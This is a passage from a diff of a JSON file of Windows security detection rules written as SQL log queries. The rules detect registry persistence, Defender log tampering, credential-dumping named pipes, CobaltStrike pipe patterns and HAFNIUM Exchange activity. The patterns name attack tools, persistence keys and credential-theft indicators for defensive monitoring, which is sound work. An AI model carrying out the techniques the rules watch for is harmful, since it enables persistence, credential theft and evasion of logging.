"proc_creation_win_hktl_invoke_obfuscation_stdin.yml" + "filename": "registry_set_uac_bypass_sdclt.yml" }, { - "title": "Uncommon One Time Only Scheduled Task At 00:00", - "id": "970823b7-273b-460a-8afc-3a6811998529", + "title": "Usage of Renamed Sysinternals Tools - RegistrySet", + "id": "8023f872-3f1d-4301-a384-801889917ab4", "status": "experimental", - "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", - "author": "pH-T (Nextron Systems)", + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], "falsepositives": [ - "Software installation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" }, { - "title": "7Zip Compressing Dump Files", - "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", + "title": "Potential Persistence Via LSA Extensions", + "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "status": "experimental", - "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" ], - "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" + "filename": "registry_set_persistence_lsa_extension.yml" }, { - "title": "MMC20 Lateral Movement", - "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - "status": "test", - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "title": "Change the Fax Dll", + "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "status": "experimental", + "description": "Detect possible persistence using Fax DLL load when service restart", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (NewValue LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" + "filename": "registry_set_fax_dll_persistance.yml" }, { - "title": "Suspicious Svchost Process", - "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "title": "Potential Persistence Via MyComputer Registry Keys", + "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", "status": "experimental", - "description": "Detects a suspicious svchost process start", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentProcessName = '') OR (ParentProcessName = '') OR (ParentProcessName = '-')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" ], - "filename": "proc_creation_win_svchost_susp_parent_process.yml" + "filename": "registry_set_persistence_mycomputer.yml" }, { - "title": "Renamed ZOHO Dctask64 Execution", - "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", - "status": "test", - "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "title": "Disabled Windows Defender Eventlog", + "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "status": "experimental", + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1055.001", - "attack.t1202", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Unknown yet" + "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_renamed_dctask64.yml" + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" }, { - "title": "HAFNIUM Exchange Exploitation Activity", - "id": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", - "status": "test", - "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", - "author": "Florian Roth (Nextron Systems)", + "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", + "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "status": "experimental", + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.t1053" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%attrib%' ESCAPE '\\' AND CommandLine LIKE '% +h %' ESCAPE '\\' AND CommandLine LIKE '% +s %' ESCAPE '\\' AND CommandLine LIKE '% +r %' ESCAPE '\\' AND CommandLine LIKE '%.aspx%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ProgramData\\\\VSPerfMon\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%VSPerfMon%' ESCAPE '\\')) OR (NewProcessName LIKE '%Opera\\_browser.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\')) OR NewProcessName LIKE '%Users\\\\Public\\\\opera\\\\Opera\\_browser.exe' ESCAPE '\\' OR (CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%Temp\\\\\\_\\_output%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\makecab.exe' ESCAPE '\\' AND CommandLine LIKE '%inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dmp.zip%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\makecab.exe' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' OR CommandLine LIKE '%compressionmemory%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\')) OR (CommandLine LIKE '% -t7z %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Programdata\\\\pst%' ESCAPE '\\' AND CommandLine LIKE '%\\\\it.zip%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\comsvcs.dll%' ESCAPE '\\' AND CommandLine LIKE '%Minidump%' ESCAPE '\\' AND CommandLine LIKE '%full %' ESCAPE '\\' AND CommandLine LIKE '%\\\\inetpub\\\\wwwroot%' ESCAPE '\\') OR (CommandLine LIKE '%Windows\\\\Temp\\\\xx.bat%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\WwanSvcdcs%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\Temp\\\\cw.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_hafnium.yml" + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" }, { - "title": "Suspicious JavaScript Execution Via Mshta.EXE", - "id": "67f113fa-e23d-4271-befa-30113b3e08b1", - "status": "test", - "description": "Detects execution of javascript code using \"mshta.exe\".", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Persistence Via App Paths Default Property", + "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "status": "experimental", + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005" + "attack.persistence", + "attack.t1546.012" ], "falsepositives": [ - "Unknown" + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%iex%' ESCAPE '\\' OR NewValue LIKE '%Invoke-%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%regsvr32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.ps1%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_javascript.yml" + "filename": "registry_set_persistence_app_paths.yml" }, { - "title": "Malicious Named Pipe", - "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "status": "test", - "description": "Detects the creation of a named pipe used by known APT malware", - "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", + "title": "Potential AutoLogger Sessions Tampering", + "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", + "status": "experimental", + "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_namedpipes.yml" + "filename": "registry_set_disable_autologger_sessions.yml" }, { - "title": "Cred Dump-Tools Named Pipes", - "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", + "title": "Registry Persistence via Explorer Run Key", + "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", "status": "test", - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((NewValue LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR NewValue LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" ], - "filename": "pipe_created_cred_dump_tools_named_pipes.yml" + "filename": "registry_set_susp_reg_persist_explorer_run.yml" }, { - "title": "Koh Default Named Pipes", - "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "title": "Office Security Settings Changed", + "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "status": "experimental", - "description": "Detects creation of default named pipes used by the Koh tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1528", - "attack.t1134.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Valid Macros and/or internal documents" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" ], - "filename": "pipe_created_koh_default_pipe.yml" + "filename": "registry_set_office_security.yml" }, { - "title": "ADFS Database Named Pipe Connection", - "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - "status": "test", - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Set TimeProviders DllName", + "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "status": "experimental", + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.003" ], "falsepositives": [ - "Processes in the filter condition" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tssdis.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" ], - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" + "filename": "registry_set_timeproviders_dllname.yml" }, { - "title": "EfsPotato Named Pipe", - "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "title": "NET NGenAssemblyUsageLog Registry Key Tamper", + "id": "28036918-04d3-423d-91c0-55ecf99fb892", "status": "experimental", - "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" ], - "filename": "pipe_created_efspotato_namedpipe.yml" + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" }, { - "title": "CobaltStrike Named Pipe Patterns", - "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", + "title": "Enabling COR Profiler Environment Variables", + "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", "status": "test", - "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", - "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1574.012" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + ], + "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + }, + { + "title": "Potential Attachment Manager Settings Attachments Tamper", + "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "status": "experimental", + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" ], "falsepositives": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE 